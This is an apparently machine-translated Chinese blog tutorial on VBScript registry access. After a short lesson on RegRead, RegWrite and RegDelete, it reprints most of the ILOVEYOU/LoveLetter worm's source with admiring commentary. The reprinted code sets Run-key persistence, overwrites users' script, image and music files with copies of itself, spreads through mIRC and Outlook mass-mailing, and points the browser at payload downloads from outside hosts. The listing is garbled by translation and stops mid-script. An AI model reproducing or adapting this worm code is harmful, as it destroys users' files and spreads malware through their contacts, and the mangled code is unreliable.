2. Tech
  3. VBScript programming 5 --- Registry

VBScript programming 5 --- Registry

zhaozj2021-02-16  62

VBScript programming 5

Registry, modifying the registry is a basic skill of programming, and scripting is of course no exception.

Here, I will no longer explain the basic structure of the registry.

1. Read the keywords and values ​​of the registry:

The regread method of the WSHSHELL object can be passed by putting the full path of the keyword

E.g:

SET WS = WScript.createObject ("wscript.shell")

v = ws.regread ("HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / Currentversion / Run / NWIZ")

WScript.echo V

2, write registry

There is a written, using the regWrite method using WSHSHELL object

View example:

Path = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /"

SET WS = WScript.createObject ("wscript.shell")

T = ws.regwrite (Path & "JJ", "Hello")

This will

HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / JJ This key value is changed to Hello. But pay attention: This key value must presented in advance.

If you want to create a new keyword, it also uses this method.

Path = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / Currentversion / Run / SSSA2000 / Love /"

SET WS = WScript.createObject ("wscript.shell")

Val = ws.regwrite (path, "nenboy")

Val = ws.regread (PATH)

WScript.echo Val

Delete keywords and values

Use the regdelete method to pass the complete path to Regdelete.

E.g

Val = ws.regdel (PATH)

Note that if you want to delete the value of the keyword, be sure to add "/" in the path, if you do not add a slant line, you will delete the entire keyword.

Ok, the most basic script programming is finished. In fact, the script is also very simple. You look at this source code of the LOVELETTER virus that has been famous. In addition to the email, I didn't speak, others are clear. ?

REM BAROK -LOVELETTER (VBE) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines' Note: Program author's signature (possib) on Error ResMe Next Dim Fso, Dirsystem, Dirwin, Dirtemp, EQ, CTR, File, VBScopy, Dow EQ = "" CTR = 0 set fso = createObject ("scripting.filesystemObject") 'Note: FileSystemObject is the most dangerous part of the M $ VBVM system, its The function is very powerful 'Use FSO from the virus to know that by modifying the registry, it can easily prevent the LETTER episode. Set file = fso.opentextfile (wscript.scriptfullname, 1) 'Returns the full path of the current script vbscopy = file.readAll Main ()' Note - Program initialization is completed. sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD" 'Note - Prevents the termination caused by the operation timeout. 'It should be said that programmers who write viruses take into account possible problems, this is worth all of the programming. Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2) 'Get the name of the system key folder "VB can be used when programming. Set c = fso.getfile (wscript.scriptfullname) 'Returns the full path of the current script C.copy (Dirsystem & "/ mskernel32.vbs")' Copies a specified file or folder from one location to another. C.copy (Dirwin & "/ Win32DLL.VBS ") C.copy (Dirsystem &" / Love-letter-for-you.txt.vbs ") 'Copy itself to the key directory. 'The file name is not very good. It's easy to find it. Regruns () html () spreadtoemail () ListAdriv () End Sub

Sub regruns () 'Modify the registry to automatically load the virus program' prevention: often check this branch in the registry. 'Known methods also put HTA in a Startup folder. The method used by the virus program is more advanced, 'Because it does not fail because of language problems.

On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"

/WIN-BUGSFIX.exe "regcreate" HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Main / Start Page "," about: blank "end if end subsub folderlist (folderspec) 'Traverse Folder On Error Resume Next dim f, f1, sf set f = fso.getfolder (folderspec) set sf = f.subfolders 'Get all subfolders of a particular folder, including system hidden folder for Each F1 in sf' F1 object infectfiles for each subfolder (f1.path) 'Operation Folderlist (f1.path) in Infectious files Folder Download NEXT END SUB

Sub ListAdriv 'traverses all drives. On Error Resume Next DIM D, DC, S set DC = fso.drives for Each D in DC if D.driveType = 2 or D.DriveType = 3 THEN '2.3 is hard disk and network sharing disk FolderList (D.Path & "/ ") End if next listadriv = s end sub

Function FileExist (filespec) 'Judging whether the file has' purely from the technical perspective, this program is not working. 'Don't write so long, you can implement the same function on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg End Function

Function FolderExist (folderspec) 'Decision is as stinking with the folder' and the previous program. On Error ResMe Next Dim Msg IF (Fso.GetFoldRexists (FSO.GETFOLDEREXISTS (Folderspec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function

Sub infectfiles (folderspec) 'Performs the operation of the infectious file.

On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files' Get all files of a particular folder, including the system Hidden File for Each F1 in FC EXT = fso.GETEXTENSITIONNAME (F1.Path) 'Get Extensions EXT = LCase (EXT)' Transition to lowercase S = LCase (f1.name) IF (ext = "vbs") or (ext = "VBE") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy 'vbscopy = file.readall ap.close elseif (ext = "js") or (ext = "jse") OR (ext = "css") or (ext = "wsh") or (ext = "hta") The set ap = fso.opentextfile (f1.path, 2, true) AP. Write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (folderspec & "/" & bname & ". vbs") fso.deletefile (f1.path) Elseif Ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) COP. COPY (F1.Path & "VBS") fso.deletefile (f1.path) Elseif (ext = "mp3") or (ext = "mp2") THEN SET MP3 = fso.createtextFile (f1.path & ". vbs") Mp3.write vbscopy mp3.close set at T = fso.getfile (f1.path) att.attributes = att.attributes 2 end if if (eq <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or (s = "scri pt.ini") or (s = "mirc.hlp") THEN SET scriptini = fso.createtetextfile (Folderspec & "/ script.ini") scriptini.writeline [script] "scriptini.writeline"; mirc script "scriptini.writeline";

Please dont edit this script ... mirc will Corru PT, IF mirc will "scriptini.writeline" Corrupt ... Windows Will Affect and Will Not Run Correctly. Thanks "'The English in the virus Author did not learn well ... but so frightened People are also suffering. 'Here, you will remind you to pay attention, don't care about the scary text, you will find a lot of vulnerabilities. Scriptini.writeline ";" scriptini.writeline "; khaled mardam-bey" scriptini.writeline " http://www.mirl.com "scriptini.writeline"; "scriptini.writeline" n0 = on 1: join: #: {"scriptini.writeLine" n1 = / if ($ nick == $ me) {halt } "scriptini.writeline" n2 = /.dcc send $ nick "& Dirsystem &" / Love-letter-fo r-you.htm "scriptini.writeLine" N3 =} "pay attention, the result of this is that MIRC can also be infected Virus. Scriptini.close EQ = folderspec end if end if next end subsub regreate (regable, regvalue) 'Modifying the registry (creating key)' This program seems to be a Microsoft's demonstration program. SET regedit = CreateObject ("wscript.shell" ) regedit.regwrite regkey, Regvalue End Sub

Function Regget (Value) 'This program seems to be a Microsoft's demonstration program. (WSH Demonstration, in Windows Folder) SET regedit = CreateObject ("wscript.shell") regget = regedit.regread (value) end function

sub spreadtoemail () 'diffusion Email On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( " Outlook.Application ") 'Virus Limitations: Only Outlook, and Outlook Express does not support. set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "IloveYou" The reason for the name of the virus' "see such a message is definitely a virus. The normal person of the mind is probably not straightforward. male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from m e." male.Attachments.Add (dirsystem & "/ LOVELETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / WAB / "& malead, 1," REG_DWORD "end if x = x 1 next regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& a, a.Addre ssEntries.Count else regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& A, A.Addre Ssentries.count End End Set Out = Nothing SET MAPI = Nothing End Sub Sub HTML 'From the technical point of view, this program is very beautiful, the reason is to fully utilize Outlook Resource 'deserves the reference of the program. 'The _ symbol in the middle of the program is the cable, so the comment is written here. 'There are many invalid statements in the program, and there are a lot of space.

On Error ResMe next Dim line, N, DTA1, DTA2, DT1, DT2, DT3, DT4, L1, DT5, DT6 DTA1 = " loveletter - HTML <? -? Title> <meta name = @ - @gene @ - @ content = @ - @ Barok VBS - Loveletter @ - @> "& vbcrf & _" <meta name = @ - @ Author @ - @ Content = @ - @ Spyder? -? Ispyder @ Mail. COM? -? @G Rammersoft Group? -? manila</p> <p>,</p> <p>Philippines</p> <p>? -? March 2000 @ - @> "& vbcrlf & _" <meta name = @ - @ description @ - @ Content = @ - @ Simple But I think this is Go @ @> "& vbcrlf & _" <? -? Head> <body onmouseout = @ - @ WINDOW.NAME = # - # main # - #; window.open (# lo ve-letter-for-you.htm # - #, # - # main # - #) @ - @ "& vbcrlf & _" onkeyDown = @ - @ WINDOW.NAME = # - # main # - #; window.open (# love-letter-for-yo u.htm # - #, # - # Main # - #) @ - @ bgproperties = @ - @ Fixed @ - @ bgcolor = @ - @ # ff9933 @ - @> "& vbcrf & _" <center> <p> this html file needed ActiveX Control <? -? p> <p> to enable to r Ead this html file <br> - please press # - # Yes # - # Button to enable Active x <? -? p> "& vbcrlf & _" <? center> <marquee loop = @ - @ infinite @ - @ bgcolor = @ - @ Yellow @ - @> -------- --z -------------------- Z - -------- <? -? Marquee> "& vbcrlf & _" <? -? Body> <? -? HTML> "& vbcrf & _" <script language = @ - @ Jscript @ - @> "& vbcrlf & _" <! -? - ?? -? "& vbcrlf & _" {var wi = screen.availwidth; var hi = screen.availheight; window.moveto (0); Window.resizeto (Wi, Hi);} "& vbrlf & _"? - ?? -? -> "& vbcrlf & _" <? -? script> "& vbcrlf & _ <script language = @ - @ Vbscript @ - @>" & vbc RLF & _ <! - "& VBCRLF & _" On Error ResMe Next "& Vbcrf & _" DIM FSO, DIRSYSTEM, WRI, CODE, CODE2, CODE3, CODE4, AW, Regdit "& VBCRLF & _" AW = 1 "& VBCRLF &</p> <p>_ "Code =" dta2 = "set fso = CreateObject (@ - @ Scripting.FileSystemObject @ - @)" & vbcrlf & _ "set dirsystem = fso.GetSpecialFolder (1)" & vbcrlf & _ "code2 = replace (code, chr (91) & chr (45) & chr (91), CHR (39)) "& VBCRLF & _" CODE3 = Replace (CODE2, CHR (93) & CHR (45) & Chr (93), CHR (34)) "& VBCRLF & _" Code4 = Replace CODE3, CHR (37) & CHR (45) & chr (37), CHR (92)) "& VBCRLF & _" set WRI = fso.createtextfile (Dirsystem & @ - @ ^ - ^ MSkernel32.vbs @ - @) "& vbcrf & _" Wri.write code4 "& vbcrf & _" Wri.close "& vbcrlf & _" ing (fso.fileexists (Dirsystem & @ - @ ^ - ^ MSkernel32.vbs @ - @)) THEN "& VBCRLF & _" IF (Err.Number = 424) THEN "& VBCRLF & _" AW = 0 "& VBCRLF & _" End IF "& VBCRLF & _" IF (AW = 1) TEN "& VBCRLF & _" Document.write @ - @ Error: Can # - # Tinitialize ActiveX @ - @ "& vbcrlf & _" window.close "& vbcrlf & _" end if "& vbcrlf & _" end if "& vbcrlf & _" Set regedit = CreateObject (@ - @ WScript.Shell @ - @) "& vbcrlf & _" regedit.RegWrite @ - @ HKEY_LOCAL_MACHINE ^ - ^ Software ^ - ^ Microsoft ^ - ^ Windo WS ^ - ^ currentversion ^ - ^ Run ^ - ^ MSkernel32 @ - @, dirsystem & @ - @ ^ - @ "& vbcrlf & _"? - ?? -? - > "& vbcrlf & _" <? -? Cript> "DT1 = Replace (DTA1, CHR (35) & chr (45) & chr (35)," ') DT1 = Replace (DT1, CHR (64) & chr (45) & chr (64), "" "" DT4 = Replace (DT1, CHR (63) & chr (45) & chr (63), "</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-16011.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="16011" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.038</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'HAUuhPvKPstRpiHS453OBhKZPcdvidO2kkw6S25cjgdVn0pVOjXyqe5rPBdhLzxgX4xbt_2FOr_2Bo6hQ2lj'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>